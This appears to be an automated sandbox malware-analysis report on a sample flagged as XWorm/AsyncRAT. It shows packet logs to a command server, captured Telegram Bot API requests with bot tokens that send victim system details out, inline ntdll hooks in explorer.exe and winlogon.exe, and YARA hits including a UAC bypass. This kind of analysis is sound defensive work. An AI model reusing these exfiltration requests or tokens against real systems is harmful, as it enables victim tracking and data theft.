                                                                                                                                                                                          Mar 28, 2024 10:25:48.228007078 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.228020906 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.228024006 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.228051901 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244683027 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244699001 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244713068 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244730949 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244740009 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244764090 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244766951 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244779110 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244807005 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244808912 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244848967 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244860888 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244863987 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244901896 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244904995 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244942904 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244956970 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244971037 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244977951 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.244996071 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.245019913 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.245038033 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.245074034 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.245090008 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.245094061 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.245107889 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.245145082 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.297024965 CET49701443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:48.298150063 CET49701443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:48.304678917 CET49725443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:48.304708004 CET44349725104.98.116.138192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.304784060 CET49725443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:48.306900024 CET49725443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:48.306915045 CET44349725104.98.116.138192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348577976 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348598003 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348664045 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348673105 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348742962 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348751068 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348761082 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348777056 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348803043 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348812103 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348819017 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348831892 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348844051 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348850965 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348875046 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348879099 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348905087 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348917961 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348922014 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348947048 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348958969 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.348977089 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349030972 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349033117 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349087000 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349107981 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349121094 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349133968 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349138021 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349160910 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349740982 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349785089 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349786997 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349838018 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349853039 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349884987 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349925041 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349970102 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.349992990 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350049019 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350090981 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350116968 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350132942 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350167990 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350235939 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350282907 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350337029 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350354910 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350410938 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350434065 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350474119 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350495100 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350565910 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350580931 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350600958 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350621939 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350622892 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350641966 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.350670099 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.451754093 CET44349701104.98.116.138192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.452624083 CET44349701104.98.116.138192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475435019 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475492001 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475543976 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475565910 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475620031 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475651979 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475676060 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475733042 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475773096 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475858927 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475933075 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.475970984 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476123095 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476165056 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476205111 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476233006 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476269960 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476308107 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476321936 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476419926 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476455927 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476458073 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476627111 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476732969 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476769924 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476779938 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476809978 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:48.476811886 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.481906891 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:48.481966019 CET700049713104.194.9.116192.168.2.7

                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          Mar 28, 2024 10:25:29.413841963 CET192.168.2.71.1.1.10xc0fdStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                          Mar 28, 2024 10:27:09.750531912 CET192.168.2.71.1.1.10x447Standard query (0)wmploc.dllA (IP address)IN (0x0001)false

                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          Mar 28, 2024 10:25:29.510133982 CET1.1.1.1192.168.2.70xc0fdNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                          Mar 28, 2024 10:25:46.482469082 CET1.1.1.1192.168.2.70xc6e8No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Mar 28, 2024 10:25:46.482469082 CET1.1.1.1192.168.2.70xc6e8No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                                                                                          Mar 28, 2024 10:27:09.847945929 CET1.1.1.1192.168.2.70x447Name error (3)wmploc.dllnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.749704149.154.167.2204433416C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-03-28 09:25:30 UTC446OUTGET /bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845&text=%E2%98%A0%20%5BXWorm%20V5.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB83F65D83688BE31381B%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20UZK6EYLC%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20pdr326 HTTP/1.1
                                                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-03-28 09:25:30 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                                          Date: Thu, 28 Mar 2024 09:25:30 GMT
                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                          Content-Length: 436
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                          2024-03-28 09:25:30 UTC436INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 35 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 33 33 30 38 38 38 31 33 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 69 70 62 6f 74 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 51 6c 69 70 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 34 36 30 34 39 38 34 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 69 6c 6c 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 79 72 69 63 73 6f 6e 67 39 38 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 31 36 31 37 39 33 30 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72 6d 20 56 35 2e
                                                                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":7584,"from":{"id":6330888131,"is_bot":true,"first_name":"Clipbot1","username":"Qlip1bot"},"chat":{"id":1046049845,"first_name":"Billy","username":"Lyricsong98","type":"private"},"date":1711617930,"text":"\u2620 [XWorm V5.


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          1192.168.2.749732149.154.167.2204431340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-03-28 09:28:22 UTC220OUTGET /bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0iSrrh-e2fE/sendMessage?chat_id=6585536474&text=User%205814831126857437469%20ran%20the%20malware HTTP/1.1
                                                                                                                                                                                          User-Agent: MyApp
                                                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          2024-03-28 09:28:24 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                                          Date: Thu, 28 Mar 2024 09:28:24 GMT
                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                          Content-Length: 58
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                          2024-03-28 09:28:24 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                          User Modules

                                                                                                                                                                                          Hook Summary

                                                                                                                                                                                          Function NameHook TypeActive in Processes
                                                                                                                                                                                          ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                                                                                                          ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                                                                                                                                                          Processes

                                                                                                                                                                                          Process: explorer.exe, Module: ntdll.dll
                                                                                                                                                                                          Function NameHook TypeNew Data
                                                                                                                                                                                          ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                          NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                          ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                          NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                          ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                          NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                          NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                          ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                          ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                          NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                          RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                          NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                          NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                          ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                          ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                          Process: winlogon.exe, Module: ntdll.dll
                                                                                                                                                                                          Function NameHook TypeNew Data
                                                                                                                                                                                          ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                          NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                          ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                          NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                          ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                          NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                          NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                          ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                          ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                          NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                          RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                          NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                          NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                          ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                          ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                                                                                                                                          Statistics

                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:10:25:26
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe"
                                                                                                                                                                                          Imagebase:0x16e98f60000
                                                                                                                                                                                          File size:466'528 bytes
                                                                                                                                                                                          MD5 hash:C8D9593196962FA5D706A207C16674CD
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1666528793.0000016E9AC91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1666528793.0000016E9B268000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1666528793.0000016E9AD6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                          Start time:10:25:27
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                          Start time:10:25:28
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                                                                                                                                          Imagebase:0xcb0000
                                                                                                                                                                                          File size:47'584 bytes
                                                                                                                                                                                          MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3905812861.000000000307B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3891974556.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3891974556.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                          Start time:10:25:28
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

